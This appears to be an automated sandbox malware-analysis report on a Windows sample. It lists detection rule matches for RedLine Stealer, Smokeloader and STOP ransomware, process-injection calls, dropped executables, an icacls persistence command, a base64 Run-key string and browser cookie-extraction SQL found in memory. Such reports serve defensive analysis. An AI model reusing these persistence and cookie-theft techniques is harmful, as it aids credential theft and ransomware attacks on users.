          Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000012.00000002.483535048.0000000000726000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000000.00000002.313241208.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 0000000B.00000002.604551133.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 00000012.00000002.483475283.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
          Source: 0000000B.00000002.605642320.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
          Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 3046.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 3046.exe PID: 5672, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: Process Memory Space: 3046.exe PID: 3112, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Temp\A33B.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: String function: 00413FF0 appears 54 times
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: 3046.exe.4.drStatic PE information: Section: .data ZLIB complexity 0.9922957294330775
          Source: 3046.exe.15.drStatic PE information: Section: .data ZLIB complexity 0.9922957294330775
          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@40/35@15/12
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: file.exeReversingLabs: Detection: 48%
          Source: file.exeVirustotal: Detection: 34%
          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4113.exe C:\Users\user\AppData\Local\Temp\4113.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\sievwvt C:\Users\user\AppData\Roaming\sievwvt
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A33B.exe C:\Users\user\AppData\Local\Temp\A33B.exe
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\98D7.exe C:\Users\user\AppData\Local\Temp\98D7.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E4.exe C:\Users\user\AppData\Local\Temp\E4.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFB.exe C:\Users\user\AppData\Local\Temp\ECFB.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D8D3.exe C:\Users\user\AppData\Local\Temp\D8D3.exe
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\AppData\Local\Temp\ECFB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe"
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
          Source: unknownProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe --Task
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe "C:\Users\user\AppData\Local\Temp\3046.exe" --Admin IsNotAutoStart IsNotTask
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeProcess created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe" -h
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4113.exe C:\Users\user\AppData\Local\Temp\4113.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A33B.exe C:\Users\user\AppData\Local\Temp\A33B.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\98D7.exe C:\Users\user\AppData\Local\Temp\98D7.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E4.exe C:\Users\user\AppData\Local\Temp\E4.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFB.exe C:\Users\user\AppData\Local\Temp\ECFB.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D8D3.exe C:\Users\user\AppData\Local\Temp\D8D3.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
          Source: C:\Windows\explorer.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe"
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeProcess created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\Temp\3046.exeProcess created: unknown unknown
          Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exeProcess created: unknown unknown
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DAC2C1E-7C5C-40eb-833B-323E85A1CE84}\InProcServer32
          Source: C:\Users\user\AppData\Local\Temp\pliu.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4113.tmpJump to behavior
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: 98D7.exe, 00000010.00000003.450929811.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.445194846.0000000000519000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;dLjomud+YRBl+d09/o
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
          Source: 98D7.exe, 00000010.00000003.450929811.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.436452262.0000000000526000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.445194846.0000000000519000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.444688857.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.444922096.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.441639812.0000000000526000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.450201207.00000000004BA000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.487521164.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.466985483.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.472850195.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.515636650.00000000004BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
          Source: llpb1133.exe, 00000014.00000003.487521164.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.472850195.00000000004BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;)
          Source: 98D7.exe, 00000010.00000003.436452262.0000000000526000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;+[
          Source: llpb1133.exe, 00000014.00000003.515636650.00000000004BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;86VK9
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: D8D3.exe, 00000013.00000003.513494216.0000000003EA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Users\user\AppData\Local\Temp\A33B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092C040 CreateToolhelp32Snapshot,Module32First,
          Source: A33B.exe.4.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\D8D3.exeMutant created: \Sessions\1\BaseNamedObjects\MilcoSoft_#Rip_X
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess996
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3046.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\98D7.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\Temp\llpb1133.exeFile read: C:\Windows\System32\drivers\etc\hosts
